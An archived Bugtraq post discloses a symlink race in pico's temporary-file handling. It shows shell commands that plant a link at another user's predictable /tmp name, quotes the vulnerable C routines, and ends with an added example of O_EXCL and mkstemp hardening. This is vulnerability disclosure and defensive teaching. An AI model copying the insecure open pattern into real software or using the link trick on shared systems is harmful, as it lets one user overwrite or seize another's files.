Bugtraq mailing list archives
Pine has a few more problems...
From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 2 Sep 1997 01:23:52 -0400
Hey all,

Since you're discussing pine, and its problems, here is something I found while reading through the source for pico, the editor in pine. It seems that there is a race condition here in the routines it uses to make temporary files.

Cheers,
dynamo

ps: floydy, get to bed. you shouldn't be working at this hour.

here's the problem in action:

bring# ps axO user | grep pico
10420 notlumpy p4  I+     0:00.04 pico
10366 lumpy    p5  I+     0:00.03 pico -w blahblah
bring# ln -s mark.sucks pico.10420
bring# ls -l
total 561
-rw-r--r--  1 lumpy  wheel  562100 Sep  1 19:34 L74874TMP.gz
lrwxrwxrwt  1 root   wheel      10 Sep  2 01:20 pico.10420 -> mark.sucks
drwxr-xr-x  3 root   wheel     512 Aug 30 21:38 screens

(at this point in another window I did a spell check, one function that calls writetmp)

bring# ls -l
total 562
-rw-r--r--  1 lumpy     wheel  562100 Sep  1 19:34 L74874TMP.gz
-rw-------  1 notlumpy  wheel      60 Sep  2 01:20 mark.sucks
drwxr-xr-x  3 root      wheel     512 Aug 30 21:38 screens
bring#

here are some code snippets:

os_unix.c ffwopen
-----------------
/*
 * Open a file for writing. Return TRUE if all is well, and FALSE on error
 * (cannot create).
 */
ffwopen(fn)
char    *fn;
{
    extern FILE *ffp;

    if ((ffp=fopen(fn, "w")) == NULL) {
        emlwrite("Cannot open file for writing", NULL);
        return (FIOERR);
    }
-----------------

os_unix.c tmpname
-----------------
/*
 * tmpname - return a temporary file name in the given buffer
 */
void
tmpname(name)
char *name;
{
    sprintf(name, "/tmp/pico.%d", getpid());    /* tmp file name */
}
-----------------

file.c writetmp
-----------------
/*
 * writetmp - write a temporary file for message text, mindful of
 *            access restrictions and included text. If n is true, include
 *            lines that indicated included message text, otw forget them
 */
char *writetmp(f, n)
int f, n;
{
    static char fn[NFILEN];
    register int s;
    register LINE *lp;
    register int nline;

    tmpname(fn);

    if ((s=ffwopen(fn)) != FIOSUC)      /* Open writes message. */
        return(NULL);

(code continues...)
-----------------
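The open pattern quoted in the post, set beside the exclusive-create form that refuses a pre-existing link. This is an added example, not code from the original post or from Pine/pico. The function names, the scratch directory and the file names in it are hypothetical, and everything runs inside a private directory created by mkdtemp().

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern from the post: fopen(fn, "w") follows a link already at fn. */
static int open_like_ffwopen(const char *fn) {
    FILE *fp = fopen(fn, "w");
    if (fp == NULL) return -errno;
    fclose(fp);
    return 0;
}

/* Hardened: O_EXCL fails with EEXIST if anything, even a dangling
 * symlink, already exists at fn, so a planted link is never followed. */
static int open_exclusive(const char *fn) {
    int fd = open(fn, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) return -errno;
    close(fd);
    return 0;
}

/* Runs both opens against a link planted at a predictable name
 * (constructed sample names). Returns a bitmask:
 * 1 = exclusive open refused the link, 2 = link target left untouched,
 * 4 = fopen created the target through the link,
 * 8 = mkstemp created a fresh file under an unpredictable name. */
int demo(void) {
    char dir[] = "/tmp/tmprace.XXXXXX", fn[64], target[64], safe[64];
    struct stat st; int r = 0, fd;
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(fn, sizeof fn, "%s/pico.%d", dir, 10420);
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(safe, sizeof safe, "%s/pico.XXXXXX", dir);
    if (symlink(target, fn) != 0) { rmdir(dir); return -1; }
    if (open_exclusive(fn) == -EEXIST) r |= 1;
    if (lstat(target, &st) != 0) r |= 2;
    if (open_like_ffwopen(fn) == 0 && lstat(target, &st) == 0) r |= 4;
    if ((fd = mkstemp(safe)) >= 0) { r |= 8; close(fd); unlink(safe); }
    unlink(target); unlink(fn); rmdir(dir);
    return r;
}

int main(void) { printf("result mask: %d\n", demo()); return 0; }
```

mkstemp() both picks the name and opens it with exclusive-create semantics in one step, which removes the predictable `/tmp/pico.<pid>` name as well as the link-following open.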